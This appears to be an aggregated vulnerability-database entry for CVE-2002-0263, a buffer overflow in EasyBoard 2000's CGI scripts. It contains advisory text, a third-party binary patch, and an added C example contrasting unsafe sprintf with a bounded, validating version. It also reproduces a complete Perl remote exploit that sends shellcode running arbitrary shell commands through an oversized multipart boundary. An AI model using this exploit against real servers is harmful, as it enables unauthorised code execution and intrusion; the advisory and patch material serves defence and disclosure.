CVE-2002-0263
CVSS 7.5
Published: 2002-05-29 00:00:00
Revised: 2016-10-17 22:17:53

[Original] Buffer overflow in EasyBoard 2000 1.27 (aka EZboard) allows remote attackers to execute arbitrary code via a long boundary value in a multipart Content-Type header to (1) ezboard.cgi, (2) ezman.cgi, or (3) ezadmin.cgi.


[CNNVD] EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability (CNNVD-200205-100)

        
Ezboard 2000 is a web-based BBS that runs on Linux systems.
Some of the CGI programs shipped with Ezboard 1.27 contain a remotely exploitable buffer overflow.
In some of these CGI programs, user-supplied data is written into a static array with sprintf. Oversized user data can overflow the array and overwrite adjacent heap addresses in memory. If a return pointer is overwritten, the affected process can be made to execute arbitrary code.
The scripts ezboard.cgi, ezman.cgi and ezadmin.cgi are affected.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0263
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0263
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-100
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=101345069220199&w=2
(UNKNOWN)  BUGTRAQ  20020211 EasyBoard 2000 Remote Buffer Overflow Vulnerability
http://www.iss.net/security_center/static/8162.php
(VENDOR_ADVISORY)  XF  ezboard-bbs-contenttype-bo(8162)
http://www.securityfocus.com/bid/4068
(VENDOR_ADVISORY)  BID  4068

- Vulnerability information

EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2002-05-29 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Jin Ho You (jhyou@chonnam.chonnam.ac.kr) provided the following patch program, which repairs the EasyBoard 2000 binaries on Linux x86:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
# ezboard-fix.pl
#
# EasyBoard 2000 Buffer Overflow Vulnerability Fix for x86 Linux version
#
# Run this program in the directory where ezboard.cgi exists.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 2002/02/11
use Fcntl qw(SEEK_SET);   # the original used SEEK_SET as a bareword; import the constant for seek()

LOOP:
for $cgi_file ("ezboard.cgi", "ezadmin.cgi", "ezman.cgi") {
    if (! -e $cgi_file) {
        print "$cgi_file does not exist.\n";
        next LOOP;
    }
    $cgi_content = `cat $cgi_file`;
    # Only touch EasyBoard 2000 binaries built for x86 Linux
    if (index($cgi_content, "EasyBoard 2000") == -1 ||
        index($cgi_content, "ld-linux.so") == -1) {
        print "$cgi_file is not EasyBoard 2000 for x86 Linux.\n";
        next LOOP;
    }
    # .rodata section header from objdump: column 3 is the VMA, column 5 the file offset
    @obj_header = split(' ', `objdump -h $cgi_file | grep rodata`);
    $moff_section = hex($obj_header[3]);
    $foff_section = hex($obj_header[5]);
    # File offset of the "--" format string and its corresponding address in memory
    $foff_fmtstr = index($cgi_content, "--");
    $moff_fmtstr = $moff_section + $foff_fmtstr - $foff_section;
    # Find the instruction operand that pushes the format string's address
    $foff_push = index($cgi_content, pack("V", $moff_fmtstr));
    if ($foff_push == -1) {
        print "$cgi_file is already fixed!\n";
        next LOOP;
    }
    printf "$cgi_file: '--%%' = 0x%08x, push '--%%' = 0x%08x\n",
        $foff_fmtstr, $foff_push;
    # Write a bounded "--%.200s" format string 17 bytes after the original one
    # and repoint the push at it, so sprintf copies at most 200 boundary bytes
    open(CGI, "+<$cgi_file") or die "cannot open $cgi_file: $!";
    seek(CGI, $foff_fmtstr + 17, SEEK_SET);
    print CGI "--%.200s";
    seek(CGI, $foff_push, SEEK_SET);
    print CGI pack("V", $moff_fmtstr + 17);
    close(CGI);
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
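The advisory describes the defect as a multipart boundary copied with an unbounded sprintf into a fixed-size array, and the unofficial patch above repairs it by replacing the "--%s" format with "--%.200s". The C program below is an added example, not code from EasyBoard or from Jin Ho You's patch: it places that unsafe pattern beside a hardened form that rejects boundaries longer than the RFC 2046 limit of 70 characters and writes with snprintf, and adds a small check a reverse proxy or log scanner could use to flag oversized boundary values. The function names, the DELIM_SIZE constant and the sample Content-Type headers are all constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* RFC 2046 section 5.1.1: a multipart boundary is 1 to 70 characters long. */
#define BOUNDARY_MAX 70
/* "--" + boundary + terminating NUL (constructed constant for this example) */
#define DELIM_SIZE (2 + BOUNDARY_MAX + 1)

/* Locate the boundary parameter in a Content-Type value such as
   "multipart/form-data; boundary=abc123". Returns a pointer to the start of
   the value (unquoted if it was quoted) and stores its length in *len, or
   returns NULL when no boundary parameter is present. */
static const char *find_boundary(const char *ctype, size_t *len)
{
    const char *p = strstr(ctype, "boundary=");
    if (!p) return NULL;
    p += strlen("boundary=");
    if (*p == '"') {
        const char *q = strchr(p + 1, '"');
        if (!q) return NULL;
        *len = (size_t)(q - p - 1);
        return p + 1;
    }
    *len = strcspn(p, "; \t\r\n");
    return p;
}

/* The pattern the advisory describes: the caller-controlled boundary is
   formatted with sprintf into a fixed array and nothing bounds the copy.
   Kept for contrast only; nothing in this file calls it. */
void build_delimiter_unsafe(char delim[DELIM_SIZE], const char *ctype)
{
    size_t len;
    const char *b = find_boundary(ctype, &len);
    if (!b) return;
    sprintf(delim, "--%.*s", (int)len, b);   /* overflows delim when len > 70 */
}

/* Hardened form: an out-of-spec boundary is an error, not an overflow, and
   the write itself is bounded by the destination size.
   Returns 0 on success and -1 (with delim emptied) on rejection. */
int build_delimiter(char delim[DELIM_SIZE], const char *ctype)
{
    size_t len;
    const char *b = find_boundary(ctype, &len);
    if (!b || len == 0 || len > BOUNDARY_MAX) {
        delim[0] = '\0';
        return -1;
    }
    int n = snprintf(delim, DELIM_SIZE, "--%.*s", (int)len, b);
    return (n > 0 && (size_t)n < DELIM_SIZE) ? 0 : -1;
}

/* Detection helper for a proxy or request-log scan: returns 1 when the
   boundary parameter exceeds the RFC limit, which is the shape of request
   this advisory is about. */
int boundary_oversized(const char *ctype)
{
    size_t len;
    const char *b = find_boundary(ctype, &len);
    return b != NULL && len > BOUNDARY_MAX;
}

/* Build a constructed Content-Type value whose boundary is n 'A' characters.
   Returns the header length, or 0 if buf is too small. */
size_t make_header(char *buf, size_t bufsize, size_t n)
{
    const char prefix[] = "multipart/form-data; boundary=";
    size_t plen = sizeof(prefix) - 1;
    if (plen + n + 1 > bufsize) return 0;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'A', n);
    buf[plen + n] = '\0';
    return plen + n;
}

int main(void)
{
    char hdr[512], delim[DELIM_SIZE];

    make_header(hdr, sizeof hdr, 300);   /* constructed: far beyond the 70-char limit */
    printf("oversized boundary flagged: %d\n", boundary_oversized(hdr));
    printf("build_delimiter on oversized header: rc=%d\n", build_delimiter(delim, hdr));

    build_delimiter(delim, "multipart/form-data; boundary=abc123");   /* constructed, in spec */
    printf("delimiter for a normal boundary: %s\n", delim);
    return 0;
}
```

Rejecting rather than truncating is deliberate: a silently truncated delimiter would no longer match the delimiter lines in the body, so the parser would misread the upload anyway. The patch's "%.200s" stops the overflow; an explicit length check in addition makes the failure visible.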
Vendor patch:
EZNE.net
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://ezne.net/

- Vulnerability information (21287)

EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability (EDBID:21287)
cgi remote
2002-02-11 Verified
0 Jin Ho You
N/A
source: http://www.securityfocus.com/bid/4068/info

Ezboard 2000 is a web based bulletin board system. It is available for Linux systems.

A vulnerability has been reported in some versions of Ezboard. In some CGI programs, user supplied data is written to a statically sized array with a sprintf call. Large amounts of user supplied data may overflow this array and overwrite adjacent areas of stack memory. If return pointers are overwritten, arbitrary code may be executed as the vulnerable process.

It has been reported that the scripts ezboard.cgi, ezman.cgi and ezadmin.cgi suffer from this vulnerability. 

#!/usr/bin/perl
# ez2crazy.pl
#
# Remote Buffer Overflow x86 Linux Exploit for
#    CrazyWWWBoard(http://www.crazywwwboard.com),
#    EasyBoard 2000(http://ezboard.new21.org) and
#    CGIs using qDecoder 4.0~5.0.8
#
# Excessive boundary delimiter string in the header
# "Content-Type: multipart/form-data" permits the buffer overflow attack.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 2002/02/11

$usage =
"usage: ez2crazy.pl [options] CGI-URL\n
  CGI-URL        URL of the target CGI
  -c command     Bourne shell command
                 Default: '/bin/echo 00ps, Crazy!;id'
  -o offset      Offset of the egg shell code,
                 Recommended [-300,+300]

example)
  ez2crazy.pl http://target.com:8080/cgi-bin/vulnerable.cgi
  ez2crazy.pl -o -47 target.com/cgi-bin/vulnerable.cgi
  ez2crazy.pl -c 'echo vulnerable.cgi has a security hole! | mail root' \\
           target.com/cgi-bin/vulnerable.cgi

";

use Getopt::Std;
getopt('oc');

if ($#ARGV < 0) {
    print $usage;
    exit(0);
};

$cgiurl = $ARGV[0];
$command = $opt_c ? $opt_c : "/bin/echo 00ps, Crazy!;id";
$offset = $opt_o ? $opt_o : 0;


$cgiurl =~ s/http:\/\///;
($host, $cgiuri) = split(/\//, $cgiurl, 2);
($host, $port) = split(/:/, $host);
$port = 80 unless $port;

$command = "/bin/echo Content-Type: text/html;/bin/echo;($command)";
$cmdlen = length($command);

$argvp = int((0x0b + $cmdlen) / 4) * 4 + 4;
$shellcode =
  "\xeb\x37"                            # jmp 0x37
. "\x5e"                                # popl %esi
. "\x89\x76" . pack(C, $argvp)          # movl %esi,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x08"                        # addl $0x8,%eax
. "\x89\x46" . pack(C, $argvp + 4)      # movl %eax,0xb(%esi)
. "\x89\xf0"                            # movl %esi,%eax
. "\x83\xc0\x0b"                        # addl $0xb,%eax
. "\x89\x46" . pack(C, $argvp + 8)      # movl %eax,0xb(%esi)
. "\x31\xc0"                            # xorl %eax,%eax
. "\x88\x46\x07"                        # movb %eax,0x7(%esi)
. "\x4e"                                # dec %esi
. "\x88\x46\x0b"                        # movb %eax,0xb(%esi)
. "\x46"                                # inc %esi
. "\x88\x46" . pack(C, 0x0b + $cmdlen)  # movb %eax,0xb(%esi)
. "\x89\x46" . pack(C, $argvp + 12)     # movl %eax,0xb(%esi)
. "\xb0\x0b"                            # movb $0xb,%al
. "\x89\xf3"                            # movl %esi,%ebx
. "\x8d\x4e" . pack(C, $argvp)          # leal 0xb(%esi),%ecx
. "\x8d\x56" . pack(C, $argvp + 12)     # leal 0xb(%esi),%edx
. "\xcd\x80"                            # int 0x80
. "\x31\xdb"                            # xorl %ebx,%ebx
. "\x89\xd8"                            # movl %ebx,%eax
. "\x40"                                # inc %eax
. "\xcd\x80"                            # int 0x80
. "\xe8\xc4\xff\xff\xff"                # call -0x3c
. "/bin/sh0-c0"                         # .string "/bin/sh0-c0"
. $command;

$offset -= length($command) / 2 + length($host . $port . $cgiurl);
$shelladdr = 0xbffffbd0 + $offset;
$noplen = 242 - length($shellcode);
$jump = $shelladdr + $noplen / 2;
$entries = $shelladdr + 250;
$egg = "\x90" x $noplen . $shellcode . pack(V, $jump) x 9
        . pack(V, $entries) x 2 . pack(V, $jump) x 2;

$content = substr($egg, 254) .
  "--\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n0\r\n--$egg--\r\n";
$contentlength = length($content);

$exploit =
"POST /$cgiuri HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.72 [ko] (X11; I; Linux 2.2.14 i686)
Host: $host:$port
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: ko
Accept-Charset: euc-kr,*,utf-8
Content-type: multipart/form-data; boundary=$egg
Content-length: $contentlength

$content
";

use Socket;
$iaddr = inet_aton($host) or die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) or die("Error: $!\n");
$proto = getprotobyname('tcp') or die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die("Error: $!\n");
connect(SOCKET, $paddr) or die("Error: $!\n");
send(SOCKET, $exploit, 0) or die("Error: $!\n");
while (<SOCKET>) {
    print;
}
close(SOCKET);
		

- Vulnerability information

6809
EasyBoard 2000 ezman.cgi Content-Type Header Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public

- Vulnerability description

A remote overflow exists in EasyBoard 2000. The sprintf() function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted URL request to the ezman.cgi script, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2002-02-10 Unknown
2002-02-10 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Jin Ho You has released an unofficial patch to address this vulnerability.

- References

- Credits

- Vulnerability information

EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
Boundary Condition Error 4068
Yes No
2002-02-11 12:00:00 2009-07-11 10:56:00
Discovered by Jin Ho You <jhyou@chonnam.chonnam.ac.kr>

- Affected program versions

EZNE.net ezboard 1.27


- Exploit

An exploit has been provided by Jin Ho You <jhyou@chonnam.chonnam.ac.kr>:

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

A third party patch has been provided by Jin Ho You <jhyou@chonnam.chonnam.ac.kr>:


EZNE.net ezboard 1.27

- References

 

 
